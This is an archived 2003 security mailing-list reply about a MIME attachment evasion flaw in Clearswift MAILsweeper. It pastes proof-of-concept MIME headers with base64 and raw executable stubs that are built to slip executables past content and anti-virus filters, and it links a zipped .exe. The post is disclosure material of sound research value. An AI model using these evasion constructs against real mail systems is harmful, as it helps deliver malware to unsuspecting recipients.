Re: Corsaire Security Advisory - Clearswift MAILsweeper MIME attachme nt evasion issue
From: http-equiv@excite.com
Date: 03/08/03
- Previous message: Paul Robichaux: "Free sample chapters from MS Exchange security book"
- Maybe in reply to: Martin O'Neal: "Corsaire Security Advisory - Clearswift MAILsweeper MIME attachme nt evasion issue"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: Sat, 8 Mar 2003 16:41:29 -0000 From: "http-equiv@excite.com" <http-equiv@MALWARE.COM> To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
<!--
Step 2: Now create a text file that will be used to hold the MIME
encoded attachment. Start notepad (or another text editor), and paste
in:
MIME-Version: 1.0
Content-Location:file:///executable.exe
Content-Transfer-Encoding: base64
TVp0AQIAAAAgAAgA//8YAIAAAAAQAAIAHgAAAAEAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
-->
That's a very interesting situation with content filters and anti-
virus filters. How many others are affected one must wonder.
Try the following as well, nothing more than pure binary:
http://www.malware.com/bin.exe.zip
MIME-Version: 1.0
Content-Location:file://foo.exe
Content-Transfer-Encoding: binary
MZD ! ÿÿu ™ > û0jr y
ž
Lot more where that came from.
End Call
-- http://www.malware.com oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo Have you discovered a security vulnerability related to Windows or a commercial product which runs on Windows? Need assistance crafting the format or translating your advisory to English? Need to verify it, or having problems contacting the Vendor? Contact mailto:Advisories@NTBugtraq.com oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
- Previous message: Paul Robichaux: "Free sample chapters from MS Exchange security book"
- Maybe in reply to: Martin O'Neal: "Corsaire Security Advisory - Clearswift MAILsweeper MIME attachme nt evasion issue"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
|
